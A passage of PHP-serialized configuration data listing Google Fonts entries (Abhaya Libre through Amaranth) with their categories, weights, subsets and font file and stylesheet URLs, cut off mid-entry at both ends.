Libre";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:7:"regular";i:1;s:3:"500";i:2;s:3:"600";i:3;s:3:"700";i:4;s:3:"800";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:7:"sinhala";}s:5:"files";a:5:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/abhayalibre/v1/zTLc5Jxv6yvb1nHyqBasVy3USBnSvpkopQaUR-2r7iU.ttf";i:500;s:89:"http://fonts.gstatic.com/s/abhayalibre/v1/wBjdF6T34NCo7wQYXgzrc5MQuUSAwdHsY8ov_6tk1oA.ttf";i:600;s:89:"http://fonts.gstatic.com/s/abhayalibre/v1/wBjdF6T34NCo7wQYXgzrc2v8CylhIUtwUiYO7Z2wXbE.ttf";i:700;s:89:"http://fonts.gstatic.com/s/abhayalibre/v1/wBjdF6T34NCo7wQYXgzrc0D2ttfZwueP-QU272T9-k4.ttf";i:800;s:89:"http://fonts.gstatic.com/s/abhayalibre/v1/wBjdF6T34NCo7wQYXgzrc_qsay_1ZmRGmC8pVRdIfAg.ttf";}s:4:"urls";a:5:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Abhaya+Libre:regular";i:500;s:56:"https://fonts.googleapis.com/css?family=Abhaya+Libre:500";i:600;s:56:"https://fonts.googleapis.com/css?family=Abhaya+Libre:600";i:700;s:56:"https://fonts.googleapis.com/css?family=Abhaya+Libre:700";i:800;s:56:"https://fonts.googleapis.com/css?family=Abhaya+Libre:800";}}s:13:"abril_fatface";a:7:{s:4:"name";s:13:"Abril Fatface";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/abrilfatface/v8/X1g_KwGeBV3ajZIXQ9VnDojjx0o0jr6fNXxPgYh_a8Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Abril+Fatface:regular";}}s:8:"aclonica";a:7:{s:4:"name";s:8:"Aclonica";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/aclonica/v6/M6pHZMPwK3DiBSlo3jwAKQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Aclonica:regular";}}s:4:"acme";a:7:{s:4:"name";s:4:"Acme";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/acme/v5/-J6XNtAHPZBEbsifCdBt-g.ttf";}s:4:"urls";a:1:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Acme:regular";}}s:5:"actor";a:7:{s:4:"name";s:5:"Actor";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/actor/v6/ugMf40CrRK6Jf6Yz_xNSmQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Actor:regular";}}s:7:"adamina";a:7:{s:4:"name";s:7:"Adamina";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/adamina/v8/RUQfOodOMiVVYqFZcSlT9w.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Adamina:regular";}}s:10:"advent_pro";a:7:{s:4:"name";s:10:"Advent Pro";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:7:{i:0;s:3:"100";i:1;s:3:"200";i:2;s:3:"300";i:3;s:7:"regular";i:4;s:3:"500";i:5;s:3:"600";i:6;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"latin-ext";}s:5:"files";a:7:{i:100;s:87:"http://fonts.gstatic.com/s/adventpro/v4/87-JOpSUecTG50PBYK4ysi3USBnSvpkopQaUR-2r7iU.ttf";i:200;s:87:"http://fonts.gstatic.com/s/adventpro/v4/URTSSjIp0Wr-GrjxFdFWnGeudeTO44zf-ht3k-KNzwg.ttf";i:300;s:87:"http://fonts.gstatic.com/s/adventpro/v4/sJaBfJYSFgoB80OL1_66m0eOrDcLawS7-ssYqLr2Xp4.ttf";s:7:"regular";s:87:"http://fonts.gstatic.com/s/adventpro/v4/1NxMBeKVcNNH2H46AUR3wfesZW2xOQ-xsNqO47m55DA.ttf";i:500;s:87:"http://fonts.gstatic.com/s/adventpro/v4/7kBth2-rT8tP40RmMMXMLJp-63r6doWhTEbsfBIRJ7A.ttf";i:600;s:87:"http://fonts.gstatic.com/s/adventpro/v4/3Jo-2maCzv2QLzQBzaKHV_pTEJqju4Hz1txDWij77d4.ttf";i:700;s:87:"http://fonts.gstatic.com/s/adventpro/v4/M4I6QiICt-ey_wZTpR2gKwJKKGfqHaYFsRG-T3ceEVo.ttf";}s:4:"urls";a:7:{i:100;s:54:"https://fonts.googleapis.com/css?family=Advent+Pro:100";i:200;s:54:"https://fonts.googleapis.com/css?family=Advent+Pro:200";i:300;s:54:"https://fonts.googleapis.com/css?family=Advent+Pro:300";s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Advent+Pro:regular";i:500;s:54:"https://fonts.googleapis.com/css?family=Advent+Pro:500";i:600;s:54:"https://fonts.googleapis.com/css?family=Advent+Pro:600";i:700;s:54:"https://fonts.googleapis.com/css?family=Advent+Pro:700";}}s:15:"aguafina_script";a:7:{s:4:"name";s:15:"Aguafina Script";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/aguafinascript/v5/65g7cgMtMGnNlNyq_Z6CvMxLhO8OSNnfAp53LK1_iRs.ttf";}s:4:"urls";a:1:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Aguafina+Script:regular";}}s:7:"akronim";a:7:{s:4:"name";s:7:"Akronim";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/akronim/v5/qA0L2CSArk3tuOWE1AR1DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Akronim:regular";}}s:6:"aladin";a:7:{s:4:"name";s:6:"Aladin";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/aladin/v5/PyuJ5cVHkduO0j5fAMKvAA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Aladin:regular";}}s:7:"aldrich";a:7:{s:4:"name";s:7:"Aldrich";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/aldrich/v6/kMMW1S56gFx7RP_mW1g-Eg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Aldrich:regular";}}s:4:"alef";a:7:{s:4:"name";s:4:"Alef";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"hebrew";}s:5:"files";a:2:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/alef/v6/ENvZ_P0HBDQxNZYCQO0lUA.ttf";i:700;s:61:"http://fonts.gstatic.com/s/alef/v6/VDgZJhEwudtOzOFQpZ8MEA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Alef:regular";i:700;s:48:"https://fonts.googleapis.com/css?family=Alef:700";}}s:8:"alegreya";a:7:{s:4:"name";s:8:"Alegreya";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:6:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";i:4;s:3:"900";i:5;s:9:"900italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:6:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/alegreya/v7/62J3atXd6bvMU4qO_ca-eA.ttf";s:6:"italic";s:86:"http://fonts.gstatic.com/s/alegreya/v7/cbshnQGxwmlHBjUil7DaIfesZW2xOQ-xsNqO47m55DA.ttf";i:700;s:86:"http://fonts.gstatic.com/s/alegreya/v7/5oZtdI5-wQwgAFrd9erCsaCWcynf_cDxXwCLxiixG1c.ttf";s:9:"700italic";s:86:"http://fonts.gstatic.com/s/alegreya/v7/IWi8e5bpnqhMRsZKTcTUWgJKKGfqHaYFsRG-T3ceEVo.ttf";i:900;s:86:"http://fonts.gstatic.com/s/alegreya/v7/oQeMxX-vxGImzDgX6nxA7KCWcynf_cDxXwCLxiixG1c.ttf";s:9:"900italic";s:86:"http://fonts.gstatic.com/s/alegreya/v7/-L71QLH_XqgYWaI1GbOVhp0EAVxt0G0biEntp43Qt6E.ttf";}s:4:"urls";a:6:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Alegreya:regular";s:6:"italic";s:55:"https://fonts.googleapis.com/css?family=Alegreya:italic";i:700;s:52:"https://fonts.googleapis.com/css?family=Alegreya:700";s:9:"700italic";s:58:"https://fonts.googleapis.com/css?family=Alegreya:700italic";i:900;s:52:"https://fonts.googleapis.com/css?family=Alegreya:900";s:9:"900italic";s:58:"https://fonts.googleapis.com/css?family=Alegreya:900italic";}}s:11:"alegreya_sc";a:7:{s:4:"name";s:11:"Alegreya SC";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:6:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";i:4;s:3:"900";i:5;s:9:"900italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:6:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/alegreyasc/v6/3ozeFnTbygMK6PfHh8B-iqCWcynf_cDxXwCLxiixG1c.ttf";s:6:"italic";s:88:"http://fonts.gstatic.com/s/alegreyasc/v6/GOqmv3FLsJ2r6ZALMZVBmkeOrDcLawS7-ssYqLr2Xp4.ttf";i:700;s:88:"http://fonts.gstatic.com/s/alegreyasc/v6/M9OIREoxDkvynwTpBAYUq3e1Pd76Vl7zRpE7NLJQ7XU.ttf";s:9:"700italic";s:88:"http://fonts.gstatic.com/s/alegreyasc/v6/5PCoU7IUfCicpKBJtBmP6c_zJjSACmk0BRPxQqhnNLU.ttf";i:900;s:88:"http://fonts.gstatic.com/s/alegreyasc/v6/M9OIREoxDkvynwTpBAYUqyenaqEuufTBk9XMKnKmgDA.ttf";s:9:"900italic";s:88:"http://fonts.gstatic.com/s/alegreyasc/v6/5PCoU7IUfCicpKBJtBmP6U_yTOUGsoC54csJe1b-IRw.ttf";}s:4:"urls";a:6:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Alegreya+SC:regular";s:6:"italic";s:58:"https://fonts.googleapis.com/css?family=Alegreya+SC:italic";i:700;s:55:"https://fonts.googleapis.com/css?family=Alegreya+SC:700";s:9:"700italic";s:61:"https://fonts.googleapis.com/css?family=Alegreya+SC:700italic";i:900;s:55:"https://fonts.googleapis.com/css?family=Alegreya+SC:900";s:9:"900italic";s:61:"https://fonts.googleapis.com/css?family=Alegreya+SC:900italic";}}s:13:"alegreya_sans";a:7:{s:4:"name";s:13:"Alegreya Sans";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:14:{i:0;s:3:"100";i:1;s:9:"100italic";i:2;s:3:"300";i:3;s:9:"300italic";i:4;s:7:"regular";i:5;s:6:"italic";i:6;s:3:"500";i:7;s:9:"500italic";i:8;s:3:"700";i:9;s:9:"700italic";i:10;s:3:"800";i:11;s:9:"800italic";i:12;s:3:"900";i:13;s:9:"900italic";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";}s:5:"files";a:14:{i:100;s:90:"http://fonts.gstatic.com/s/alegreyasans/v3/TKyx_-JJ6MdpQruNk-t-PJFGFO4uyVFMfB6LZsii7kI.ttf";s:9:"100italic";s:90:"http://fonts.gstatic.com/s/alegreyasans/v3/gRkSP2lBpqoMTVxg7DmVn2cDnjsrnI9_xJ-5gnBaHsE.ttf";i:300;s:90:"http://fonts.gstatic.com/s/alegreyasans/v3/11EDm-lum6tskJMBbdy9acB1LjARzAvdqa1uQC32v70.ttf";s:9:"300italic";s:90:"http://fonts.gstatic.com/s/alegreyasans/v3/WfiXipsmjqRqsDBQ1bA9CnfqlVoxTUFFx1C8tBqmbcg.ttf";s:7:"regular";s:90:"http://fonts.gstatic.com/s/alegreyasans/v3/KYNzioYhDai7mTMnx_gDgn8f0n03UdmQgF_CLvNR2vg.ttf";s:6:"italic";s:90:"http://fonts.gstatic.com/s/alegreyasans/v3/TKyx_-JJ6MdpQruNk-t-PD4G9C9ttb0Oz5Cvf0qOitE.ttf";i:500;s:90:"http://fonts.gstatic.com/s/alegreyasans/v3/11EDm-lum6tskJMBbdy9aQqQmZ7VjhwksfpNVG0pqGc.ttf";s:9:"500italic";s:90:"http://fonts.gstatic.com/s/alegreyasans/v3/WfiXipsmjqRqsDBQ1bA9Cs7DCVO6wo6i5LKIyZDzK40.ttf";i:700;s:90:"http://fonts.gstatic.com/s/alegreyasans/v3/11EDm-lum6tskJMBbdy9aVCbmAUID8LN-q3pJpOk3Ys.ttf";s:9:"700italic";s:90:"http://fonts.gstatic.com/s/alegreyasans/v3/WfiXipsmjqRqsDBQ1bA9CpF66r9C4AnxxlBlGd7xY4g.ttf";i:800;s:90:"http://fonts.gstatic.com/s/alegreyasans/v3/11EDm-lum6tskJMBbdy9acxnD5BewVtRRHHljCwR2bM.ttf";s:9:"800italic";s:90:"http://fonts.gstatic.com/s/alegreyasans/v3/WfiXipsmjqRqsDBQ1bA9CicOAJ_9MkLPbDmrtXDPbIU.ttf";i:900;s:90:"http://fonts.gstatic.com/s/alegreyasans/v3/11EDm-lum6tskJMBbdy9aW42xlVP-j5dagE7-AU2zwg.ttf";s:9:"900italic";s:90:"http://fonts.gstatic.com/s/alegreyasans/v3/WfiXipsmjqRqsDBQ1bA9ChRaDUI9aE8-k7PrIG2iiuo.ttf";}s:4:"urls";a:14:{i:100;s:57:"https://fonts.googleapis.com/css?family=Alegreya+Sans:100";s:9:"100italic";s:63:"https://fonts.googleapis.com/css?family=Alegreya+Sans:100italic";i:300;s:57:"https://fonts.googleapis.com/css?family=Alegreya+Sans:300";s:9:"300italic";s:63:"https://fonts.googleapis.com/css?family=Alegreya+Sans:300italic";s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Alegreya+Sans:regular";s:6:"italic";s:60:"https://fonts.googleapis.com/css?family=Alegreya+Sans:italic";i:500;s:57:"https://fonts.googleapis.com/css?family=Alegreya+Sans:500";s:9:"500italic";s:63:"https://fonts.googleapis.com/css?family=Alegreya+Sans:500italic";i:700;s:57:"https://fonts.googleapis.com/css?family=Alegreya+Sans:700";s:9:"700italic";s:63:"https://fonts.googleapis.com/css?family=Alegreya+Sans:700italic";i:800;s:57:"https://fonts.googleapis.com/css?family=Alegreya+Sans:800";s:9:"800italic";s:63:"https://fonts.googleapis.com/css?family=Alegreya+Sans:800italic";i:900;s:57:"https://fonts.googleapis.com/css?family=Alegreya+Sans:900";s:9:"900italic";s:63:"https://fonts.googleapis.com/css?family=Alegreya+Sans:900italic";}}s:16:"alegreya_sans_sc";a:7:{s:4:"name";s:16:"Alegreya Sans SC";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:14:{i:0;s:3:"100";i:1;s:9:"100italic";i:2;s:3:"300";i:3;s:9:"300italic";i:4;s:7:"regular";i:5;s:6:"italic";i:6;s:3:"500";i:7;s:9:"500italic";i:8;s:3:"700";i:9;s:9:"700italic";i:10;s:3:"800";i:11;s:9:"800italic";i:12;s:3:"900";i:13;s:9:"900italic";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";}s:5:"files";a:14:{i:100;s:92:"http://fonts.gstatic.com/s/alegreyasanssc/v3/trwFkDJLOJf6hqM93944kVnzStfdnFU-MXbO84aBs_M.ttf";s:9:"100italic";s:92:"http://fonts.gstatic.com/s/alegreyasanssc/v3/qG3gA9iy5RpXMH4crZboqqakMVR0XlJhO7VdJ8yYvA4.ttf";i:300;s:92:"http://fonts.gstatic.com/s/alegreyasanssc/v3/AjAmkoP1y0Vaad0UPPR46-1IqtfxJspFjzJp0SaQRcI.ttf";s:9:"300italic";s:92:"http://fonts.gstatic.com/s/alegreyasanssc/v3/0VweK-TO3aQgazdxg8fs0CnTKaH808trtzttbEg4yVA.ttf";s:7:"regular";s:92:"http://fonts.gstatic.com/s/alegreyasanssc/v3/6kgb6ZvOagoVIRZyl8XV-EklWX-XdLVn1WTiuGuvKIU.ttf";s:6:"italic";s:92:"http://fonts.gstatic.com/s/alegreyasanssc/v3/trwFkDJLOJf6hqM93944kTfqo69HNOlCNZvbwAmUtiA.ttf";i:500;s:92:"http://fonts.gstatic.com/s/alegreyasanssc/v3/AjAmkoP1y0Vaad0UPPR46_hHTluI57wqxl55RvSYo3s.ttf";s:9:"500italic";s:92:"http://fonts.gstatic.com/s/alegreyasanssc/v3/0VweK-TO3aQgazdxg8fs0NqVvxKdFVwqwzilqfVd39U.ttf";i:700;s:92:"http://fonts.gstatic.com/s/alegreyasanssc/v3/AjAmkoP1y0Vaad0UPPR4600aId5t1FC-xZ8nmpa_XLk.ttf";s:9:"700italic";s:92:"http://fonts.gstatic.com/s/alegreyasanssc/v3/0VweK-TO3aQgazdxg8fs0IBYn3VD6xMEnodOh8pnFw4.ttf";i:800;s:92:"http://fonts.gstatic.com/s/alegreyasanssc/v3/AjAmkoP1y0Vaad0UPPR46wQgSHD3Lo1Mif2Wkk5swWA.ttf";s:9:"800italic";s:92:"http://fonts.gstatic.com/s/alegreyasanssc/v3/0VweK-TO3aQgazdxg8fs0HStmCm6Rs90XeztCALm0H8.ttf";i:900;s:92:"http://fonts.gstatic.com/s/alegreyasanssc/v3/AjAmkoP1y0Vaad0UPPR461Rf9EWUSEX_PR1d_gLKfpM.ttf";s:9:"900italic";s:92:"http://fonts.gstatic.com/s/alegreyasanssc/v3/0VweK-TO3aQgazdxg8fs0IvtwEfTCJoOJugANj-jWDI.ttf";}s:4:"urls";a:14:{i:100;s:60:"https://fonts.googleapis.com/css?family=Alegreya+Sans+SC:100";s:9:"100italic";s:66:"https://fonts.googleapis.com/css?family=Alegreya+Sans+SC:100italic";i:300;s:60:"https://fonts.googleapis.com/css?family=Alegreya+Sans+SC:300";s:9:"300italic";s:66:"https://fonts.googleapis.com/css?family=Alegreya+Sans+SC:300italic";s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Alegreya+Sans+SC:regular";s:6:"italic";s:63:"https://fonts.googleapis.com/css?family=Alegreya+Sans+SC:italic";i:500;s:60:"https://fonts.googleapis.com/css?family=Alegreya+Sans+SC:500";s:9:"500italic";s:66:"https://fonts.googleapis.com/css?family=Alegreya+Sans+SC:500italic";i:700;s:60:"https://fonts.googleapis.com/css?family=Alegreya+Sans+SC:700";s:9:"700italic";s:66:"https://fonts.googleapis.com/css?family=Alegreya+Sans+SC:700italic";i:800;s:60:"https://fonts.googleapis.com/css?family=Alegreya+Sans+SC:800";s:9:"800italic";s:66:"https://fonts.googleapis.com/css?family=Alegreya+Sans+SC:800italic";i:900;s:60:"https://fonts.googleapis.com/css?family=Alegreya+Sans+SC:900";s:9:"900italic";s:66:"https://fonts.googleapis.com/css?family=Alegreya+Sans+SC:900italic";}}s:10:"alex_brush";a:7:{s:4:"name";s:10:"Alex Brush";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/alexbrush/v6/ooh3KJFbKJSUoIRWfiu8o_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Alex+Brush:regular";}}s:13:"alfa_slab_one";a:7:{s:4:"name";s:13:"Alfa Slab One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/alfaslabone/v5/Qx6FPcitRwTC_k88tLPc-Yjjx0o0jr6fNXxPgYh_a8Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Alfa+Slab+One:regular";}}s:5:"alice";a:7:{s:4:"name";s:5:"Alice";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/alice/v7/wZTAfivekBqIg-rk63nFvQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Alice:regular";}}s:5:"alike";a:7:{s:4:"name";s:5:"Alike";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/alike/v8/Ho8YpRKNk_202fwDiGNIyw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Alike:regular";}}s:13:"alike_angular";a:7:{s:4:"name";s:13:"Alike Angular";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/alikeangular/v6/OpeCu4xxI3qO1C7CZcJtPT3XH2uEnVI__ynTBvNyki8.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Alike+Angular:regular";}}s:5:"allan";a:7:{s:4:"name";s:5:"Allan";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/allan/v7/T3lemhgZmLQkQI2Qc2bQHA.ttf";i:700;s:62:"http://fonts.gstatic.com/s/allan/v7/zSxQiwo7wgnr7KkMXhSiag.ttf";}s:4:"urls";a:2:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Allan:regular";i:700;s:49:"https://fonts.googleapis.com/css?family=Allan:700";}}s:7:"allerta";a:7:{s:4:"name";s:7:"Allerta";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/allerta/v7/s9FOEuiJFTNbMe06ifzV8g.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Allerta:regular";}}s:15:"allerta_stencil";a:7:{s:4:"name";s:15:"Allerta Stencil";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/allertastencil/v7/CdSZfRtHbQrBohqmzSdDYFf2eT4jUldwg_9fgfY_tHc.ttf";}s:4:"urls";a:1:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Allerta+Stencil:regular";}}s:6:"allura";a:7:{s:4:"name";s:6:"Allura";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/allura/v4/4hcqgZanyuJ2gMYWffIR6A.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Allura:regular";}}s:8:"almendra";a:7:{s:4:"name";s:8:"Almendra";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:4:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/almendra/v8/PDpbB-ZF7deXAAEYPkQOeg.ttf";s:6:"italic";s:86:"http://fonts.gstatic.com/s/almendra/v8/CNWLyiDucqVKVgr4EMidi_esZW2xOQ-xsNqO47m55DA.ttf";i:700;s:86:"http://fonts.gstatic.com/s/almendra/v8/ZpLdQMj7Q2AFio4nNO6A76CWcynf_cDxXwCLxiixG1c.ttf";s:9:"700italic";s:86:"http://fonts.gstatic.com/s/almendra/v8/-tXHKMcnn6FqrhJV3l1e3QJKKGfqHaYFsRG-T3ceEVo.ttf";}s:4:"urls";a:4:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Almendra:regular";s:6:"italic";s:55:"https://fonts.googleapis.com/css?family=Almendra:italic";i:700;s:52:"https://fonts.googleapis.com/css?family=Almendra:700";s:9:"700italic";s:58:"https://fonts.googleapis.com/css?family=Almendra:700italic";}}s:16:"almendra_display";a:7:{s:4:"name";s:16:"Almendra Display";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:93:"http://fonts.gstatic.com/s/almendradisplay/v6/2Zuu97WJ_ez-87yz5Ai8fF6uyC_qD11hrFQ6EGgTJWI.ttf";}s:4:"urls";a:1:{s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Almendra+Display:regular";}}s:11:"almendra_sc";a:7:{s:4:"name";s:11:"Almendra SC";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/almendrasc/v6/IuiLd8Fm9I6raSalxMoWeaCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Almendra+SC:regular";}}s:8:"amarante";a:7:{s:4:"name";s:8:"Amarante";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/amarante/v4/2dQHjIBWSpydit5zkJZnOw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Amarante:regular";}}s:8:"amaranth";a:7:{s:4:"name";s:8:"Amaranth";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:4:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/amaranth/v6/7VcBog22JBHsHXHdnnycTA.ttf";s:6:"italic";s:86:"http://fonts.gstatic.com/s/amaranth/v6/UrJlRY9LcVERJSvggsdBqPesZW2xOQ-xsNqO47m55DA.ttf";i:700;s:86:"http://fonts.gstatic.com/s/amaranth/v6/j5OFHqadfxyLnQRxFeox6qCWcynf_cDxXwCLxiixG1c.ttf";s:9:"700italic";s:86:"http://fonts.gstatic.